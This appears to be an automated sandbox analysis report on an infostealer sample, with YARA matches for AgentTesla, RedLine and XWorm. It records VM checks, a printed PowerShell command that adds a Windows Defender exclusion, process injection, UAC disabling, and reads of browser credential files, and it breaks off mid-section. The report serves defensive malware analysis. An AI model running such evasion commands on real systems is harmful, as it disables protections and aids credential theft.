Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: AddInProcess32.exe, 00000006.00000002.1554299366.00000000032A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231LR
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: AddInProcess32.exe, 00000006.00000002.1553011083.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000004023000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C0D008	Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force			Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"			Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Queries volume information: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 6.2.AddInProcess32.exe.7200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 6.2.AddInProcess32.exe.7860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.7860000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1570014475.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQPO3D93876738.scr.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: RFQPO3D93876738.scr.exe, 00000000.00000002.1555711757.000002423D198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDER9C100DD6

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

